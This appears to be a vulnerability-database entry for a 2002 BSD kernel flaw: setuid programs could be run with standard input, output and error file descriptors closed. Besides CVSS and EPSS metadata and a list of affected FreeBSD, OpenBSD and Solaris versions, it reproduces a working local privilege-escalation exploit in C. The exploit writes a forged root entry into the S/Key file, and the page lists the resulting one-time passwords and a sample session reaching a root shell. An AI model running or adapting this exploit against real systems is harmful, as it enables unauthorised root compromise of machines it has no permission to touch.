Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.2 |
|
AV:L/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 21407
Publication date : 2002-04-22 22h00 +00:00
Author : phased
EDB Verified : Yes
/*
source: https://www.securityfocus.com/bid/4568/info
It has been reported that BSD-based kernels do not check to ensure that the C library standard I/O file descriptors 0-2 are valid open files before exec()ing setuid images. Consequently, I/O that are opened by a setuid process may be assigned file descriptors equivelent to those used by the C library as 'standard input','standard output', and 'standard error'.
This may result in untrusted, attacker supplied data being written to sensitive I/O channels. Local root compromise has been confirmed as a possible consequence.
*/
/*
phased/b10z
[email protected]
23/04/2002
stdio kernel bug in All releases of FreeBSD up to and including 4.5-RELEASE
decided to make a trivial exploit to easily get root :)
> id
uid=1003(phased) gid=999(phased) groups=999(phased)
> ./iosmash
Adding phased:
<--- HIT CTRL-C --->
> su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes#
this program makes the following skeys valid
95: CARE LIVE CARD LOFT CHIC HILL
96: TESS OIL WELD DUD MUTE KIT
97: DADE BED DRY JAW GRAB NOV
98: MASS OAT ROLL TOOL AGO CAM
99: DARK LEW JOLT JIVE MOS WHO
http://www.snosoft.com
cheers Joost Pol
*/
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
while(dup(1) != -1);
close(2);
execl("/usr/bin/keyinit",
"\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
}
Products Mentioned
Configuraton 0
Freebsd>>Freebsd >> Version 4.4
Freebsd>>Freebsd >> Version 4.5
Freebsd>>Freebsd >> Version 4.5
Openbsd>>Openbsd >> Version 2.0
Openbsd>>Openbsd >> Version 2.1
Openbsd>>Openbsd >> Version 2.2
Openbsd>>Openbsd >> Version 2.3
Sun>>Solaris >> Version 2.5.1
Sun>>Solaris >> Version 2.6
Sun>>Solaris >> Version 7.0
Sun>>Solaris >> Version 8.0
Sun>>Sunos >> Version -
Sun>>Sunos >> Version 5.5.1
Sun>>Sunos >> Version 5.7
Sun>>Sunos >> Version 5.8
References